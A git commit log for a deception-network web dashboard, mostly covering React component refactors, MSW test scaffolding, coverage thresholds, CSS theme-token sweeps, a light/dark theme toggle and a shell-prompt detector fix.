  GET    /topologies/?status=active
  DELETE /canary/blobs/:uuid

deleteBlob returns { ok, reason } so the page can branch the
toast/alert tone without seeing the axios error type. Wiring
into CanaryTokens.tsx lands in the next commit.

- New CanaryTokens/useCanaryTokens.ts
- useCanaryTokens.test.ts MSW-covers happy load, viewer 403 ->
  empty blobs, deleteBlob ok + refused-with-detail paths, and the
  markTokenRevoked optimistic write.
2026-05-09 05:14:48 -04:00
69f547f75e refactor(decnet_web/CanaryTokens): move FileDropModal + LS helpers
Verbatim move of the file-drop modal (~310 LOC) and its
localStorage glue (FILEDROP_LS_KEY, FileDropEntry type,
loadFileDrops, saveFileDrops) into one file. The list view that
shows these entries lives in the page; the persistence layer
travels with the writer.

- New CanaryTokens/FileDropModal.tsx (modal + LS helpers + entry type)
- FileDropModal.test.tsx covers loadFileDrops empty / round-trip /
  200-row cap / malformed-JSON, plus modal title rendering, the
  bypass-warning banner, and CANCEL -> onClose.
- CanaryTokens.tsx loses the inline modal + LS glue plus the
  now-unused imports (useRef/X/AlertTriangle/useEscapeKey/
  useFocusTrap, plus BTN_PRIMARY/BTN_GHOST/Field that only the
  modals consumed).
2026-05-09 05:13:51 -04:00
b664655dcb refactor(decnet_web/CanaryTokens): move UploadModal out
Verbatim move of the artifact upload modal (~130 LOC) into its
own file. Drop-or-browse picker, server-side-injection warning
banner, and the multipart POST stay unchanged.

- New CanaryTokens/UploadModal.tsx
- UploadModal.test.tsx covers title rendering, empty drop-zone
  hint, server-injection warning banner, UPLOAD-disabled-until-
  file, and CANCEL -> onClose.
2026-05-09 05:11:46 -04:00
e30455551d refactor(decnet_web/CanaryTokens): move CreateTokenModal out
Verbatim move of the canary-token creation modal (~280 LOC) into
its own file. Renamed from CreateModal to CreateTokenModal so the
component name carries scope across the package boundary.

- New CanaryTokens/CreateTokenModal.tsx
- CreateTokenModal.test.tsx covers title rendering, CANCEL ->
  onClose, empty-deckies hint, and the Operator-upload mode
  switch revealing the no-blobs message. useFocusTrap is
  vi.mock'd to avoid jsdom focus shenanigans.
- CanaryTokens.tsx loses the inline modal + its now-unused
  imports (KNOWN_GENERATORS, KIND_OPTIONS, GeneratorName).
2026-05-09 05:10:27 -04:00
a35048b174 refactor(decnet_web/CanaryTokens): extract types + helpers + ui
Foundation for the CanaryTokens split. Types, error/format helpers,
and the inline style + small primitives move out of the page so
the upcoming modal/list extractions can import without reaching
back through CanaryTokens.tsx.

- New CanaryTokens/types.ts (BlobRow, DeckyOption, TopologyOption,
  Scope, KNOWN_GENERATORS / GeneratorName, KIND_OPTIONS, STATE_COLOR)
- New CanaryTokens/helpers.ts (extractError, fmt, fmtBytes)
- New CanaryTokens/ui.tsx (INPUT_STYLE, BTN_PRIMARY, BTN_GHOST,
  Field, Stat)
- CanaryTokens.tsx loses ~110 LOC of inline definitions; behavior
  unchanged.
2026-05-09 05:08:37 -04:00
08c274486e test(decnet_web): raise coverage floor after DeckyFleet split
Phase 2 lands. DeckyFleet.tsx dropped from 1,674 to 274 LOC; the
fleet page is now a thin composition of useDeckyFleet + 6
extracted children (DeckyInspectPanel, IntervalEditor, DeckyCard,
DeployWizard, DeckyFilters, DeckyGridEmpty), each with co-located
tests.

Lock the gain by bumping the threshold floor in vite.config.ts:

  lines       7  -> 11
  functions   6  -> 10
  branches    5  -> 8
  statements  7  -> 11

Phase 2 final scoreboard: 21 test files, 98 tests, all green.
2026-05-09 05:06:08 -04:00
9da6f6983e refactor(decnet_web/DeckyFleet): wire hook + extract filter UI
Final integration step. The page shell is now a thin composition
of the hook + the previously-extracted children:

- DeckyFleet.tsx: 1,674 -> 274 LOC. Page owns only the
  pure-UI state (filter, search, armed-confirm, modal visibility,
  selected-card-for-inspect) and the toast-wrapping handlers that
  translate hook results into toast tone. Polling, REST plumbing,
  role lookup, and archetype catalog all moved to useDeckyFleet
  in the prior commit.
- New DeckyFilters.tsx (header pill row + DEPLOY shortcut) +
  DeckyGridEmpty.tsx (fleet-empty vs. filter-empty copy).
- DeckyFilters.test.tsx + DeckyGridEmpty.test.tsx cover count
  rendering, filter-click callbacks, and admin-gated DEPLOY
  visibility.

Two-step teardown arming logic stays in the page (it's pure UI).
Toast tone branching on { ok, reason } from useDeckyFleet
results moves the policy decision out of the data layer.
2026-05-09 05:05:31 -04:00
9ddeb1a08c refactor(decnet_web/DeckyFleet): extract useDeckyFleet data hook
Lift every read- and write-side data flow off the page shell:

  GET  /system/deployment-mode  (decides which list endpoint to hit)
  GET  /deckies | /swarm/deckies (mode-switched + shape-normalized)
  GET  /config (role -> isAdmin)
  GET  /topologies/archetypes (live catalog with bundled fallback)
  POST /deckies/:name/mutate
  PUT  /deckies/:name/mutate-interval
  POST /swarm/hosts/:uuid/teardown
  10s polling loop refreshing mode + list

Operations return discriminated results ({ok:true} | {ok:false,
reason:...}) so the page can branch toast tone without seeing the
axios error type. Toasts, arm-confirm, and modal visibility stay
in the consuming page — the hook is pure data.

- New DeckyFleet/useDeckyFleet.ts
- useDeckyFleet.test.ts MSW-covers initial load, swarm-mode shape
  normalization, mutate ok/error paths, teardown ok path, and
  applyServicesChange optimistic write.
- DeckyFleet.tsx wiring lands in the next commit so the diff stays
  reviewable.
2026-05-09 05:03:31 -04:00
1e2bc41ab1 refactor(decnet_web/DeckyFleet): move DeployWizard out
Lift the multi-step deploy wizard (~520 LOC) plus its private
INI-builder helpers (PLACEHOLDER_LINES, b64encodeUtf8, buildIni,
PickMode type) into their own file. Verbatim move; the
underscore-prefixed helpers drop the leading underscore now that
they're file-local rather than competing with hoisted parent
constants.

- New DeckyFleet/DeployWizard.tsx
- DeployWizard.test.tsx covers the closed render guard, the
  open-at-step-0 archetype list, NEXT-disabled-until-archetype,
  and CANCEL -> onClose. ServiceConfigFields is vi.mock'd to a
  stub since it pulls schemas via api.get() that are out of
  scope for these tests.
- DeckyFleet.tsx loses the wizard plus the now-unused imports
  (DEFAULT_SERVICES, Modal, PickIcon, ServiceConfigFields and
  its type aliases).
2026-05-09 05:01:33 -04:00
849caffaf1 refactor(decnet_web/DeckyFleet): move DeckyCard out
Lift the per-decky tile (~430 LOC) into its own file. Tarpit
controls, live add/remove service flow, and the per-service config
toggle stay inside the card — those are tile-local UI concerns and
only ever rendered from this component anyway.

- New DeckyFleet/DeckyCard.tsx
- DeckyCard.test.tsx covers identity row + services rendering,
  admin-gated FORCE MUTATE visibility, the FORCE MUTATE callback,
  TEARDOWN -> CONFIRM toggle when armed matches, and card-body
  click firing onInspect. AddServiceConfigModal +
  ServiceConfigForm are vi.mock'd so we don't need MSW handlers
  for their unrelated network fetches.
- DeckyFleet.tsx loses the inline component plus the now-unused
  imports it dragged in (Network/PowerOff/RefreshCw/Plus/X icons,
  ServiceConfigForm, AddServiceConfigModal, useCallback).
2026-05-09 04:58:25 -04:00
b6ff288dcf refactor(decnet_web/DeckyFleet): move IntervalEditor out
Verbatim move of the per-decky mutation-interval modal (~60 LOC)
into its own file. Saves null when the toggle is off, minutes
otherwise.

- New DeckyFleet/IntervalEditor.tsx
- IntervalEditor.test.tsx covers null-current disabled path,
  numeric-current enabled path, and CANCEL not firing onSave.
- src/test/fixtures/decky.ts now derives DeckyFixture from the
  canonical Decky type (the fixture's loose swarm shape was
  missing host_address/host_status; aligning to Decky catches
  that statically).
2026-05-09 04:55:30 -04:00
032ffbb4eb refactor(decnet_web/DeckyFleet): move DeckyInspectPanel out
Lift the right-side inspect drawer (~115 LOC) into its own file.
This is a verbatim move — same JSX, same useEscapeKey + body
overflow lock, same swarm-section gating. Underscore-prefixed
helper calls (_dotFor, _stateColor) drop the leading underscore
since they're now imported from helpers.tsx.

- New DeckyFleet/DeckyInspectPanel.tsx
- DeckyInspectPanel.test.tsx covers identity-row rendering, the
  SERVICES chip list, the conditional SWARM block, and the close
  button callback.
- DeckyFleet.tsx loses the panel + the now-unused useEscapeKey
  import.
2026-05-09 04:54:10 -04:00
8c168c64a8 refactor(decnet_web/DeckyFleet): extract types + helpers
Foundation for the DeckyFleet split. Types and helpers move to
their own files so the upcoming subcomponent extractions can
import without reaching back through the parent module.

- New DeckyFleet/types.ts (Decky, SwarmDeckyRaw, SwarmMeta,
  Archetype, FilterKey, DeckyStatus). Names exported to match the
  pattern set by AttackerDetail/types.ts.
- New DeckyFleet/helpers.tsx (archetypeIcon, PickIcon, dotFor,
  hitsFor, stateColor). Underscore-prefixed call sites stay via
  import-rename so this commit changes zero behavior.
- DeckyFleet.tsx loses ~110 LOC of inline definitions plus the
  now-unused icon imports (Cpu / Database / Globe / Monitor /
  Shield / Terminal).
2026-05-09 04:52:48 -04:00
6d7c0b6419 test(decnet_web): raise coverage floor after AttackerDetail split
Phase 1 of the UI refactor is in. AttackerDetail dropped from
2,579 LOC inline data + JSX to a 408-LOC shell composed of
extracted sections, each with co-located tests. Lock the gain by
bumping the threshold floor in vite.config.ts:

  lines       0 -> 7
  functions   0 -> 6
  branches    0 -> 5
  statements  0 -> 7

Future PRs raise these; never lower. Phase 1 final scoreboard:
9 test files, 45 tests, all green.
2026-05-09 04:49:32 -04:00
d5efebd73d refactor(decnet_web/AttackerDetail): extract MailLogPanel section
Lift STORED MAIL into its own section and pull the mail drawer
selection state along with it. Section signals admin-gating
through the section's own props (mailForbidden), since the data
hook already converts a 403 into that boolean.

- New AttackerDetail/sections/MailLogPanel.tsx
- MailLogPanel.test.tsx covers row rendering, mailForbidden empty
  state, no-mail empty state, from_hdr/from_addr/mail_from
  fallback, and drawer open/close. MailDrawer vi.mock'd same as
  ArtifactDrawer.
- AttackerDetail.tsx loses the mail JSX block, mailItem state,
  and now-unused Mail/MailDrawer imports.
2026-05-09 04:48:44 -04:00
14713eb294 refactor(decnet_web/AttackerDetail): extract ArtifactsPanel section
Lift CAPTURED ARTIFACTS into its own section, taking the drawer
selection state with it (the parent shell no longer owns
artifact-modal state).

- New AttackerDetail/sections/ArtifactsPanel.tsx
  Drawer is rendered as a sibling of the section so its z-index
  and focus-trap behavior mirror the original.
- ArtifactsPanel.test.tsx covers row rendering with parsed SD
  fields, empty state, missing stored_as (no OPEN button), and
  the open/close cycle. ArtifactDrawer is vi.mock'd to a stub
  so we don't need MSW handlers for its content fetch.
- AttackerDetail.tsx loses the artifact JSX block, the artifact
  state, and now-unused Paperclip/Package/ArtifactDrawer imports.
2026-05-09 04:47:17 -04:00
9cee4b2e71 refactor(decnet_web/AttackerDetail): extract CommandsViewer section
Lift the COMMANDS collapsible — paginated table with header-bar
prev/next controls — into its own section. The page math
(cmdTotalPages = ceil(total/limit)) and conditional empty state
both live in the section now.

- New AttackerDetail/sections/CommandsViewer.tsx
- CommandsViewer.test.tsx covers title formatting (unfiltered vs.
  filtered), empty state, single-page pagination hiding, and
  prev/next button behavior
- AttackerDetail.tsx loses the IIFE-wrapped commands JSX block
  plus now-unused ChevronLeft/ChevronRight/Terminal imports
2026-05-09 04:45:41 -04:00
7b21f31078 refactor(decnet_web/AttackerDetail): extract ServicesTargeted section
Lift the SERVICES TARGETED collapsible — interactive two-tone badge
chips with click-to-filter — into its own section. The selection
state was already lifted into useAttackerDetail in the prior
commits, so the section just consumes serviceFilter /
setServiceFilter as props.

- New AttackerDetail/sections/ServicesTargeted.tsx
- ServicesTargeted.test.tsx covers badge rendering, empty state,
  inactive-click-sets-filter, and active-click-clears-filter
- AttackerFixture grows ip_leaks/ip_leaks_total fields so the
  TimelineSection rotation test (added in the prior commit) keeps
  passing under the new factory shape
2026-05-09 04:44:25 -04:00
95e1a4ab7a refactor(decnet_web/AttackerDetail): extract TimelineSection
Lift the TIMELINE collapsible (timestamps, ASN, reverse DNS,
leaked-IPs row with rotation detection) into its own section.
LeakedIPsRow + the rotation/inline-limit constants come along
since they were only ever used here.

Also moves the shared `Section` collapsible primitive into
AttackerDetail/ui.tsx so the remaining sections can adopt the
template without re-importing through the parent module.

- New AttackerDetail/sections/TimelineSection.tsx (LeakedIPsRow
  inline as a private helper)
- AttackerDetail/ui.tsx now exports both Tag and Section
- AttackerDetail.tsx loses LeakedIPsRow, the Section helper, the
  Timeline JSX block, and now-unused imports (ChevronUp, ChevronDown,
  AttackerData)
- TimelineSection.test.tsx covers timestamps, unknown-origin path,
  rotation badge, empty leaks, collapse, and toggle callback
2026-05-09 04:43:13 -04:00
f524d283b7 refactor(decnet_web/AttackerDetail): extract AttackerStats section
Lift the 5-up counter grid + the conditional scan-vs-interact row
into AttackerStats. The activity row's visibility predicate
collapses into a single boolean inside the section so the parent
no longer encodes UX rules.

- New AttackerDetail/sections/AttackerStats.tsx
- AttackerStats.test.tsx covers all-five counters, activity present,
  activity empty, and service_activity undefined paths.
2026-05-09 04:40:34 -04:00
653ae04e88 refactor(decnet_web/AttackerDetail): extract AttackerHeader section
Lift the header (IP, country tag, traversal badge, identity badge)
into its own section component. Tag helper moves to a shared
AttackerDetail/ui.tsx so future sections can reuse it without
re-importing through AttackerDetail.tsx.

- New AttackerDetail/sections/AttackerHeader.tsx (~50 LOC)
- New AttackerDetail/ui.tsx for shared presentational helpers
- AttackerDetail.tsx imports both; local Tag definition deleted
- AttackerHeader.test.tsx covers country present/absent,
  TRAVERSAL badge, IDENTITY click-through, identity null path
2026-05-09 04:39:30 -04:00
22cfb10617 refactor(decnet_web/AttackerDetail): extract data layer into useAttackerDetail
The AttackerDetail page body owned all 7 REST fetches plus 2 SSE
streams inline as 200+ lines of useEffect plumbing. Lift them into
a single hook so section components extracted in follow-up commits
consume typed values, not setState pairs.

- New ./AttackerDetail/types.ts holds the canonical AttackerData,
  BehaviouralObservation, AttributionPrimitiveState plus newly-named
  ArtifactLog / SessionLog / SmtpTargetRow / MailLog / CommandRow
  (previously inline anonymous types).
- New ./AttackerDetail/useAttackerDetail.ts owns:
  * GET /attackers/:id (404 -> ATTACKER NOT FOUND)
  * GET /attackers/:id/attribution (silent-tolerant)
  * GET /attackers/:id/commands paged with 422 alert preserved
  * GET /attackers/:id/{artifacts,smtp-targets,mail,transcripts}
    (mail surfaces a 403 boolean for the admin-gated viewer)
  * useAttackerStream + useIdentityStream subscriptions, including
    the live attribution-state-changed merge.
- AttackerDetail.tsx re-exports BehaviouralObservation /
  AttributionPrimitiveState so AttackerDetail.behaviour_panel.test
  and any future external importer keeps working unchanged.
- New useAttackerDetail.test.ts covers loading -> success, 404,
  paged commands offset, serviceFilter resets cmdPage, and mail 403
  via MSW handlers (the SSE hooks are vi.mock'd; jsdom can't host
  EventSource).

No behavior change for the rendered page; all 37 tests green.
2026-05-09 04:36:35 -04:00
07a7d4918c test(decnet_web): MSW-based test foundation for UI refactor
Phase 0 of the decnet_web refactor: stand up an MSW server, fixtures,
and a router-aware render helper so the upcoming god-component splits
(AttackerDetail first) can land with same-commit test coverage.

- msw devDep + setupServer wired into src/test/setup.ts
- src/test/server.ts re-exports server, http, HttpResponse, apiUrl()
- src/test/fixtures/{attacker,decky,canary,topology}.ts factories
- src/test/renderWithRouter.tsx wraps MemoryRouter + ToastProvider
- baseline coverage thresholds (0%) in vite.config.ts; raise per PR
- coverage/ added to decnet_web/.gitignore

Existing Orchestrator/AttackerDetail/ThemeLab tests stay on vi.mock
and continue to pass; new tests use MSW.
2026-05-09 04:30:51 -04:00
3318b15044 fix(decnet_web/Layout): theme toggle icon stays visible on hover
The global button:hover rule in index.css forces color: var(--bg)
+ matrix-glow on the lucide icon's currentColor stroke, making
the sun/moon icon disappear into the toggle button's tinted
background on hover. Pin color: var(--accent) and box-shadow:
none on .theme-toggle-btn:hover so the icon stays in its base
colour and the button doesn't pick up the wider button-hover
halo.
2026-05-09 04:18:48 -04:00
5a34b1846c fix(decnet_web/Layout): kill residual theme-swap open flash
Even with fill: 'both', the new pseudo paints once at its default
style (no clip-path = full size) before the JS animation
registers — the brief open flash that survived the previous fix.

Pre-publish click coords as --reveal-x / --reveal-y on <html>
before calling startViewTransition. The static CSS rule on
::view-transition-new(root) now sets clip-path: circle(0px at
var(--reveal-x) var(--reveal-y)) as the pseudo's default, so
the very first paint is already fully clipped. The animation
then grows the circle outward from there.
2026-05-09 04:17:50 -04:00
ccff1467b1 fix(decnet_web/Layout): outward theme reveal, no flash either end
ANTI prefers the new theme growing outward from the click point
(visually clearer cause-and-effect than the old theme burning
away). The original outward implementation flashed at the start
because the new pseudo defaulted to its computed style (no
clip-path = fully visible) for one frame before the JS animation
registered.

Switching the animation's fill from 'forwards' to 'both' enforces
the start keyframe (circle(0) at click point) before the first
paint, in addition to pinning the end keyframe through pseudo
teardown. New layer is invisible until the animation begins,
fully visible until cleanup. No flash either end.
2026-05-09 04:17:07 -04:00
6d1fc3a081 fix(decnet_web/Layout): theme swap end-of-animation flash
Without fill: 'forwards' the clip-path keyframes release at
animation end and the pseudo reverts to its computed style
(no clip-path), so the old layer flashes back at full size for
a frame before View Transitions tears the pseudo-elements down.
Pinning the final keyframe with fill-forwards keeps the old
layer fully clipped through to teardown.
2026-05-09 04:15:44 -04:00
a81ea3f973 fix(decnet_web/Layout): theme swap animation no longer flashes opposite mode
Growing the NEW theme layer from circle(0) outward leaves a
one-frame gap where the new pseudo is fully opaque at full size
(the default state) before the clip-path animation registers.
Result: a flash of the destination theme right before the
reveal starts.

Inverted the layering and animation direction:
 - NEW theme snapshot sits on the bottom (z-index 0), static
 - OLD theme snapshot sits on top (z-index 1), shrinks via
   clip-path from circle(N) at click point down to circle(0)

The new layer is now hidden behind the old one until the old
shrinks away — no flash possible because the new layer was
never visible before the animation. Same 520ms duration, same
ease curve, same direction-of-travel from the user's POV
(circle expanding from cursor).
2026-05-09 04:14:54 -04:00
438a6e3e45 feat(decnet_web/Layout): topbar dark/light toggle with circular reveal
User-facing theme toggle ships now that the design system has
been audited end-to-end. A Sun/Moon button lives between the
threat indicator and the SYSTEM status pill in the topbar — same
slim 28x28 voice as the rest of the topbar controls, no chrome
shouting at the user.

Click coords drive a View Transitions API circle clip-path that
grows from the cursor to the farthest viewport corner over 520ms
with the project's standard --ease curve. Browsers without
startViewTransition (older Firefox, Safari < 18) fall through to
an unanimated swap — the hook returns instantly in that case.

Persistence is two-tier:
 - localStorage decnet_theme — the user's saved preference, the
   thing the topbar toggle writes. Survives reloads, applies
   everywhere.
 - sessionStorage decnet_theme_lab — dev-mode lab override (Task
   3). Tab-scoped, wins on boot so devs can A/B without nuking
   the saved preference.

App.tsx hydrates both on first mount in the right order so the
correct theme is on <html> before the first paint.

useThemeToggle is a small hook in lib/ rather than a Layout-only
helper so the same toggle can be reused later from a settings page
or hotkey.
2026-05-09 04:01:24 -04:00
9cab37db3a fix(decnet_web/css): three light-mode dimness fixes
--dim-color and --danger-color were referenced across drawers and
RemoteUpdates but never defined; --dim-color silently inherited
(defeating its purpose) and --danger-color fell back to literal
#f88 salmon (the 'ugly red' WifiOff icon next to UNREACHABLE
hosts). Added both as aliases in :root: --dim-color = var(--fg-3),
--danger-color = var(--alert).

--fg-2/3/4 alphas in light mode were tuned identical to dark
(0.78/0.55/0.35), but ink-on-cream needs more punch than
matrix-on-black at the same alpha — the deploy preview code
block (.code-block .comment / .key) and every dim caption
rendered too faint. Bumped to 0.88/0.70/0.50.

.maze-net-box.inactive applies opacity 0.42 + grayscale(0.7) for
the 'no traffic' signal. On cream that fades the LAN out of
visibility entirely. Override in light mode keeps the dotted
border as the dim-state cue and bumps opacity to 0.85 so the
header text stays legible.
2026-05-09 03:56:06 -04:00
388a968d89 fix(decnet_web/css): sweep violet rgba literals to tokens
Credentials drawer code-block labels (printable:, b64:) and a
dozen other violet wash/tint sites still carried bare rgba(238,
130, 238, *) literals — bright magenta in light mode where
--violet has resolved to charcoal-purple #2d1b4e. Mirrors the
prior matrix/alert/warn/info sweeps: by-alpha buckets land on
var(--violet-tint-10) or var(--violet).
2026-05-09 03:50:29 -04:00
aa0b22aacb fix(decnet_web/css): sweep rgba colour literals to tokens app-wide
Before this commit, ~80 rgba() literals across 24 files were
hardcoding alert-red, warn-amber, info-cyan, panel-dark, and
white-text-with-alpha shades that bypassed the token cascade.
Net effect in light mode: the .eml/SESSREC drawers, AttackerDetail
verdict pills, MazeNET net-box headers, OPEN/REPLAY action
buttons, threat-intel cards, and all the dim 'whitish' overlays
stayed on their dark-mode hex values, producing the unreadable
panels in the screenshots.

Sweep maps each rgba colour family onto the existing token by
alpha bucket — rgba(13,17,23,*) -> var(--panel),
rgba(255,65,65,*) -> var(--alert)/-tint-10,
rgba(255,170,0,*) and rgba(224,160,64,*) -> var(--warn)/-tint-10,
rgba(0,200,255,*) -> var(--info)/-tint-10,
rgba(255,255,255,*) -> var(--fg-N)/var(--matrix-tint-N) by alpha.

VERDICT_TONE in AttackerDetail (MALICIOUS/SUSPICIOUS/BENIGN/
NO SIGNAL) was the worst offender — string literals
'#ff4d4d'/'#ffae42'/'#5fd07a'/rgba(255,255,255,0.4) baked into
inline JS styles. Now resolves at render time via var(--alert)/
var(--warn)/var(--ok)/var(--fg-4).

New tokens in :root:
 - --bg-color (alias of --bg) — drawers used this name with
   #0d1117 fallback that fired in every browser because nothing
   defined --bg-color. Adding the alias makes drawers re-tone.
 - --info / --info-tint-10 / --info-tint-30 — REPLAY buttons and
   any future neutral-secondary use.
 - --ok — semantic alias for 'verified good' (matrix in dark,
   emerald in light) so BENIGN pills stay readable across themes.

Login.css left intentionally — pre-auth surface, not themed.
2026-05-09 03:48:05 -04:00
11b2da7d54 fix(decnet_web/css): light-mode contrast across wizards, code blocks, hovers
Sweeps four invariant violations that were leaking dark surfaces
into light mode and producing the unreadable / inverted areas:

  1. Hardcoded `color: #000` in 14 :hover rules across 11 CSS
     files swapped to `color: var(--bg)` — collapses to #000 in
     dark mode (no-op), becomes cream in light. Fixes DEPLOY
     DECKIES (button hover was rendering charcoal-purple text on
     charcoal-purple background).
  2. Hardcoded `background: #000` (3 sites) and `#0d1117`
     (3 sites) replaced with `var(--bg)` / `var(--panel)`. Fixes
     code blocks and modal panels staying dark on cream — the
     deploy-wizard preview, topology-creation NAME input, and the
     MazeNET canvas backdrop now follow the active theme.
  3. `rgba(0,0,0,0.35)` and `rgba(0,0,0,0.5)` input/card
     backgrounds (ServiceConfigForm, DeckyFleet .input)
     swapped to `var(--panel)`. Fixes per-service config rows
     in the deploy wizard rendering as dark slabs.
  4. SVG arrow markers in MazeNET Canvas.tsx hardcoded
     `fill="#00ff41"` / "#ee82ee" — replaced with currentColor +
     style hook so they re-resolve on theme change.

New behaviour: light-mode hovers tint instead of inverting. The
dark-mode rules fully fill bg with --matrix/--violet/--alert and
flip text to --bg; that lands cream-on-near-ink in light mode
and reads as a jarring colour inversion on every cursor move. Light
mode now layers a *-tint-10 background and keeps text in its
base colour. Single override block in index.css targets every
scoped `.X-btn`/`.btn`/`button:hover` via :is() + [class*="-btn"]
so we don't have to chase every component file.
2026-05-09 03:43:47 -04:00
34c778277a refactor(decnet_web/css): promote hardcoded matrix/warn/crit colours to tokens
37 bare rgba(0, 255, 65, ...) literals across 10 component CSS
files were forcing matrix-green to bleed into light mode no matter
what data-theme=light overrode in :root. They're now mapped onto
existing tokens by alpha bucket (0.025-0.05 -> --matrix-tint-5,
0.08-0.10 -> --matrix-tint-10, 0.18-0.30 -> --matrix-tint-30,
0.4 -> --fg-4, 0.5-0.6 -> --fg-3, 0.7-0.8 -> --fg-2).

Adds --warn (#e0a040), --amber (alias of --warn), --crit
(#e74c3c), and their tint-10 variants to :root, with
ink-friendly light-mode overrides. Sweeps bare #ffaa00 / #e0a040
/ #f59e0b / #ff4d4d / #e74c3c usages in the same files onto the
new tokens.

Files with var(--token, #fallback) patterns left alone — those
were already token-driven and the fallbacks just provide safety.
Login.css and inline TSX hex left for the per-page sweep.
2026-05-09 03:36:04 -04:00
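The alpha-bucket mapping in the commit above can be read as a small lookup table. The sketch below is illustrative only: the sweep itself was a CSS edit, and `token_for_alpha` and `rewrite_matrix_rgba` are hypothetical helper names. Alphas that fall between the listed buckets are left untouched, since the commit message does not say where they land.

```python
import re

# (low, high, token) buckets as listed in the commit message.
_BUCKETS = [
    (0.025, 0.05, "var(--matrix-tint-5)"),
    (0.08, 0.10, "var(--matrix-tint-10)"),
    (0.18, 0.30, "var(--matrix-tint-30)"),
    (0.4, 0.4, "var(--fg-4)"),
    (0.5, 0.6, "var(--fg-3)"),
    (0.7, 0.8, "var(--fg-2)"),
]

# Matches rgba(0, 255, 65, <alpha>) with flexible whitespace.
_MATRIX_RGBA = re.compile(
    r"rgba\(\s*0\s*,\s*255\s*,\s*65\s*,\s*([0-9.]+)\s*\)"
)


def token_for_alpha(alpha):
    """Return the token for an alpha value, or None if no bucket matches."""
    for low, high, token in _BUCKETS:
        if low <= alpha <= high:
            return token
    return None


def rewrite_matrix_rgba(css):
    """Swap matrix-green rgba() literals for tokens where a bucket applies."""
    def _swap(match):
        token = token_for_alpha(float(match.group(1)))
        # Assumption: literals outside every bucket are kept verbatim.
        return token if token is not None else match.group(0)

    return _MATRIX_RGBA.sub(_swap, css)
```

Keeping unmatched alphas verbatim makes a dry run safe: anything the table does not cover shows up unchanged in the diff and can be handled by hand.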
df0c8e12e7 fix(decnet_web/css): light theme goes ink-monotone, not green-on-cream
Initial light-theme palette kept --matrix as a darker emerald
and --violet as a darker purple, which washed out badly on
warm cream — auth-helper chips, ACTIVE/PASSIVE/INACTIVE pills,
and CREDS/REUSE tabs all became unreadable because their tint
backgrounds + low-saturation text collapsed to sludge.

Light mode now collapses --matrix and --violet to near-ink
shades (#0d0d0d and #2d1b4e). --alert stays the one
saturated colour — the only element allowed to shout.
Dark mode is untouched; the matrix-vibe identity stays
exclusive to dark.

Also collapses the matrix/violet accent knob in light mode:
data-accent only flavours dark mode now, since two ink
shades are visually identical.
2026-05-09 03:31:18 -04:00
47c57271e7 feat(decnet_web/theme-lab): light theme tokens + dev toggle
Adds html[data-theme="light"] block to index.css overriding the
core six tokens (bg, matrix, violet, panel, border, alert), the
matrix/violet/alert tints, and the foreground opacity ramp to a
cream-on-ink palette anchored on #dbdad6. Glows are no-op'd —
light mode trades neon haloes for hard 1px borders.

Lab page gets a Dark/Light toggle that flips
html.dataset.theme and persists to sessionStorage
(decnet_theme_lab) — intentionally tab-scoped, not user-facing.
App.tsx hydrates the same key on boot so a tab reload keeps the
dev's chosen theme. The user-facing localStorage toggle ships
later via Config.
2026-05-09 03:23:50 -04:00
f3f7bff717 feat(decnet_web/theme-lab): kitchen-sink component zoo
Renders every primitive in the design system on the lab page so
theme-token edits can be evaluated against all states at once:
colour swatches with WCAG contrast vs --bg, the full type scale,
buttons (5 variants × default/hover/disabled), badges and status
pills, info/error banners, metric cards, table rows
(default/hover/selected/drop-target), form inputs, drawer panel
sample, and net-box compose states (internet/inactive/selected/
drop-target — independent classes layering, per memory).

Wrapper uses .fleet-root so global .btn/.btn.violet/etc resolve
identically to real pages. Lab-local CSS owns layout only — every
colour comes from index.css tokens.
2026-05-09 03:22:21 -04:00
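The "WCAG contrast vs --bg" figure on each swatch follows the standard WCAG 2.x contrast-ratio formula. The lab page itself is TypeScript; the Python below is only a sketch of the arithmetic, and the function names are hypothetical.

```python
def _linear(channel_8bit):
    """Linearise one 8-bit sRGB channel (WCAG 2.x definition)."""
    c = channel_8bit / 255
    return c / 12.92 if c <= 0.03928 else ((c + 0.055) / 1.055) ** 2.4


def relative_luminance(hex_colour):
    """Relative luminance of a #rrggbb colour."""
    h = hex_colour.lstrip("#")
    r, g, b = (int(h[i:i + 2], 16) for i in (0, 2, 4))
    return 0.2126 * _linear(r) + 0.7152 * _linear(g) + 0.0722 * _linear(b)


def contrast_ratio(fg, bg):
    """WCAG contrast ratio; the argument order does not matter."""
    lighter, darker = sorted(
        (relative_luminance(fg), relative_luminance(bg)), reverse=True
    )
    return (lighter + 0.05) / (darker + 0.05)
```

Under this formula, the near-ink #0d0d0d on the cream #dbdad6 named in the light-theme commits elsewhere in this log clears the 7:1 AAA threshold for normal text.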
846a50dbbf feat(decnet_web/theme-lab): scaffold dev-gated /theme-lab route
Adds VITE_DECNET_DEVELOPER build-time gate: when unset, the
isDeveloperMode() helper collapses to a constant false and Vite
tree-shakes both the lazy import and the conditional <Route> out
of the prod bundle.

ThemeLab is currently a header stub; subsequent tasks fill it
with the design-system primitive zoo plus a Dark/Light toggle
for live token tuning. Route is intentionally absent from
ROUTE_LABELS / sidebar — direct URL only.
2026-05-09 03:18:34 -04:00
65ddaaa681 fix(behave_shell/F.0): tighten prompt detector — log lines ending in '>' no longer vote
_detect_prompt_suffix accepted ANY line ending in $#%> as a PS1 prompt,
so a single `cat /var/log/dpkg.log` (195 lines closing in `<none>`)
flooded environmental.shell_type votes and flipped a plainly-bash
session to fish.

A prompt line now requires either a trailing space after the suffix
(default PS1 shape across bash/zsh/fish/PowerShell) or a PS1-shape
token (user@host, "PS " prefix, or a Windows drive-letter prefix).

Regression tests pin the dpkg.log false-positive and a $-terminated
prose line.
2026-05-09 02:57:40 -04:00
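A minimal sketch of the tightened rule in the commit above, assuming the detector inspects one output line at a time. `detect_prompt_suffix` and the regular expression are stand-ins for illustration, not the actual body of `_detect_prompt_suffix`.

```python
import re

_SUFFIXES = "$#%>"

# PS1-shape tokens: user@host, a "PS " prefix, or a drive-letter prefix.
_PS1_SHAPE = re.compile(r"\b[\w.-]+@[\w.-]+|^PS |^[A-Za-z]:\\")


def detect_prompt_suffix(line):
    """Return the prompt suffix character, or None if the line is not a prompt."""
    text = line.rstrip("\r\n")
    # Case 1: suffix followed by the trailing space of a default PS1.
    if len(text) >= 2 and text.endswith(" ") and text[-2] in _SUFFIXES:
        return text[-2]
    # Case 2: bare suffix, accepted only alongside a PS1-shape token.
    if text and text[-1] in _SUFFIXES and _PS1_SHAPE.search(text):
        return text[-1]
    return None
```

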